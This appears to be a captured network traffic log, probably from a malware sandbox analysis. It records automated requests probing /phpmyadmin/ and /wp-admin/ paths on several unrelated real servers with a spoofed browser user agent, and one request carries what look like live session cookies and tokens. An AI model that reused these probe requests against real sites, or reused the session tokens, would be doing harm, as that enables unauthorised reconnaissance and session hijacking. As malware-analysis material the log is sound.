                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC932INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store,no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/Error/NotFound?aspxerrorpath=/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Server:
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src * data:; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdn.jsdelivr.net https://ajax.googleapis.com www.google-analytics.com www.googletagmanager.com; frame-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' 'unsafe-inline' 'unsafe-eval' www.google-analytics.com; font-src 'self' 'unsafe-inline' 'unsafe-eval';
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 176
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC176INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 73 63 2e 6e 69 63 2e 69 6e 2f 45 72 72 6f 72 2f 4e 6f 74 46 6f 75 6e 64 3f 61 73 70 78 65 72 72 6f 72 70 61 74 68 3d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ssc.nic.in/Error/NotFound?aspxerrorpath=/phpmyadmin/">here</a>.</h2></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                177192.168.2.66399736.255.71.45443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: instructory.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC325INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                content-length: 66424
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                etag: W/"10378-WueGOxVCt7BIL9I4WlUOvR0gh88"
                                                                                                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                cache-control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC12175INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 49 6e 73 74 72 75 63 74 6f 72 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 61 63 68 69 6e 67 2c 20 49 6e 73 74 72 75 63 74 69 6f 6e 2c 20 45 2d 4c 65 61 72 6e 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <base href="/"> <title>Instructory</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="keywords" content="Teaching, Instruction, E-Learni
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1398INData Raw: 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 39 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 70 61 64 64 69 6e 67 3a 30 20 31 30 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 70 78 7d 2e 68 65 61 64 65 72 2d 6d 61 69 6e 2d 73 65 63 74 69 6f 6e 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 2e 68 65 61 64 65 72 2d 6d 65 6e 75 2d 6c 69 6e 6b 73 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 2e 6d 61 69 6e 2d 6d 65 6e 75 2d 6c 69 6e 6b 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 6c 69 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 61 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: [_ngcontent-sc231]{position:relative;font-size:19px;color:#fff;padding:0 10px;display:inline-block;margin-top:3px}.header-main-section[_ngcontent-sc231] .header-menu-links[_ngcontent-sc231] .main-menu-link[_ngcontent-sc231] li[_ngcontent-sc231] a.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC16320INData Raw: 6e 74 2d 73 63 32 33 31 5d 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 68 65 61 64 65 72 2d 6d 61 69 6e 2d 73 65 63 74 69 6f 6e 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 2e 68 65 61 64 65 72 2d 6d 65 6e 75 2d 6c 69 6e 6b 73 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 2e 6d 61 69 6e 2d 6d 65 6e 75 2d 6c 69 6e 6b 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 2e 70 72 6f 66 69 6c 65 2d 61 76 61 74 61 72 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 70 78 7d 2e 68 65 61 64 65 72 2d 6d 61 69 6e 2d 73 65 63 74 69 6f 6e 5b 5f 6e 67 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nt-sc231]{color:#fff}.header-main-section[_ngcontent-sc231] .header-menu-links[_ngcontent-sc231] .main-menu-link[_ngcontent-sc231] .profile-avatar[_ngcontent-sc231]{padding-left:25px;padding-right:0;border-radius:50px}.header-main-section[_ngcontent
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC10242INData Raw: 5d 20 20 20 2e 63 6f 75 72 73 65 2d 63 61 74 65 67 6f 72 79 2d 6d 65 6e 75 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 2e 63 6f 75 72 73 65 2d 63 61 74 65 67 6f 72 79 2d 6d 65 6e 75 2d 6c 69 73 74 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 7b 68 65 69 67 68 74 3a 32 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 70 78 7d 2e 68 65 61 64 65 72 2d 77 72 61 70 70 65 72 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 2e 68 65 61 64 65 72 2d 6d 61 69 6e 2d 73 65 63 74 69 6f 6e 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 2e 68 65 61 64 65 72 2d 6d 65 6e 75 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 32 33 31 5d 20 20 20 2e 63 6f 75 72 73 65 2d 63 61 74 65 67 6f 72 79 2d 77 72 61 70 70 65 72 5b 5f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ] .course-category-menu[_ngcontent-sc231] .course-category-menu-list[_ngcontent-sc231]{height:200px;margin-top:3px}.header-wrapper[_ngcontent-sc231] .header-main-section[_ngcontent-sc231] .header-menu[_ngcontent-sc231] .course-category-wrapper[_
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1398INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 66 6f 6f 74 65 72 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 20 20 20 2e 66 6f 6f 74 65 72 2d 63 6f 6e 74 65 6e 74 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 20 20 20 2e 6d 61 69 6e 2d 72 6f 77 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 20 20 20 2e 63 6f 6e 74 61 63 74 2d 75 73 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 66 6f 6f 74 65 72 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 20 20 20 2e 66 6f 6f 74 65 72 2d 63 6f 6e 74 65 6e 74 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 2d 73 65 63 74 69 6f 6e 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 7b 6d 61 78 2d 77 69 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ign:center}footer[_ngcontent-sc91] .footer-content[_ngcontent-sc91] .main-row[_ngcontent-sc91] .contact-us[_ngcontent-sc91]{text-align:center}footer[_ngcontent-sc91] .footer-content[_ngcontent-sc91] .footer-links-section[_ngcontent-sc91]{max-wid
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC4194INData Raw: 6e 74 2d 73 63 39 31 5d 20 20 20 2e 6d 61 69 6e 2d 72 6f 77 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 20 20 20 2e 63 6f 6e 74 61 63 74 2d 75 73 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 66 6f 6f 74 65 72 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 20 20 20 2e 66 6f 6f 74 65 72 2d 63 6f 6e 74 65 6e 74 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 2d 73 65 63 74 69 6f 6e 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 7b 6d 61 78 2d 77 69 64 74 68 3a 39 35 25 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 66 6f 6f 74 65 72 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 5d 20 20 20 2e 73 75 62 73 63 72 69 62 65 5b 5f 6e 67 63 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nt-sc91] .main-row[_ngcontent-sc91] .contact-us[_ngcontent-sc91]{text-align:center}footer[_ngcontent-sc91] .footer-content[_ngcontent-sc91] .footer-links-section[_ngcontent-sc91]{max-width:95%;margin:auto}footer[_ngcontent-sc91] .subscribe[_ngco
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC12142INData Raw: 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 31 2e 31 73 7d 2e 73 6b 2d 77 61 76 65 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 20 20 20 2e 73 6b 2d 72 65 63 74 33 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 31 73 7d 2e 73 6b 2d 77 61 76 65 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 20 20 20 2e 73 6b 2d 72 65 63 74 34 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 2e 39 73 7d 2e 73 6b 2d 77 61 76 65 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 20 20 20 2e 73 6b 2d 72 65 63 74 35 5b 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 31 39 5d 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ngcontent-sc19]{animation-delay:-1.1s}.sk-wave[_ngcontent-sc19] .sk-rect3[_ngcontent-sc19]{animation-delay:-1s}.sk-wave[_ngcontent-sc19] .sk-rect4[_ngcontent-sc19]{animation-delay:-.9s}.sk-wave[_ngcontent-sc19] .sk-rect5[_ngcontent-sc19]{animation-d
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC48INData Raw: 63 39 31 3d 22 22 20 72 6f 75 74 65 72 6c 69 6e 6b 3d 22 23 22 20 68 72 65 66 3d 22 2f 25 32 33 22 3e 20 43 6f 75 72 73 65 20 43 61 74 65 67 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: c91="" routerlink="#" href="/%23"> Course Catego
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC8507INData Raw: 72 69 65 73 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 3d 22 22 3e 3c 61 20 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 3d 22 22 20 72 6f 75 74 65 72 6c 69 6e 6b 3d 22 23 22 20 68 72 65 66 3d 22 2f 25 32 33 22 3e 20 43 72 65 61 74 65 20 61 6e 20 41 63 63 6f 75 6e 74 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 3d 22 22 3e 3c 64 69 76 20 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 3d 22 22 20 63 6c 61 73 73 3d 22 73 75 70 70 6f 72 74 22 3e 3c 64 69 76 20 5f 6e 67 63 6f 6e 74 65 6e 74 2d 73 63 39 31 3d 22 22 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 4e 65 65 64 20 53 75 70 70 6f 72 74 3c 2f 64 69 76 3e 3c 75 6c 20 5f 6e 67 63 6f 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ries </a></li><li _ngcontent-sc91=""><a _ngcontent-sc91="" routerlink="#" href="/%23"> Create an Account </a></li></ul></div><div _ngcontent-sc91=""><div _ngcontent-sc91="" class="support"><div _ngcontent-sc91="" class="title">Need Support</div><ul _ngcon


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                178192.168.2.663133142.250.105.84443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC180OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 36 68 71 36 4c 65 5f 45 30 6b 6b 31 4e 6f 6c 6d 6d 55 54 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="m6hq6Le_E0kk1NolmmUTAw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                179192.168.2.663171138.66.39.205443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC184OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login2.innova.puglia.it
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC249INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.6.0 (N;ecid=1446536446601918,0:1)
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC194INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpMyAdmin/ was not found.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                180192.168.2.66516944.195.133.145443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC655OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: JSESSIONID=A41748C5FFBE0AA3717601AC030D7592; BbRouter=expires:1707142568,id:AA5B0F56EE09038D64C6A202F41CF905,signature:a5b7125ed6ba37cb61202ccfee1c2f3a72304b38c669361818b7f385ffa34717,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:16c6130f-60d2-4ae4-9489-4e6878a2dd45; AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://ucv.blackboard.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1092INHTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-ES
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Sun, 05 Feb 2023 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 05 Feb 2004 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                P3P: CP="CAO PSA OUR"
                                                                                                                                                                                                                                                                                                                                                                Pragma: private
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BbRouter=expires:1707133570,id:AA5B0F56EE09038D64C6A202F41CF905,signature:e16c598909ce53479710348186cc41d89e4f8b844724c259eecf61bcf62fa508,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:16c6130f-60d2-4ae4-9489-4e6878a2dd45; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-appserver: ip-10-146-220-254.ec2.internal
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-product: Blackboard Learn &#8482; 3900.84.0-rel.31+aedff82
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
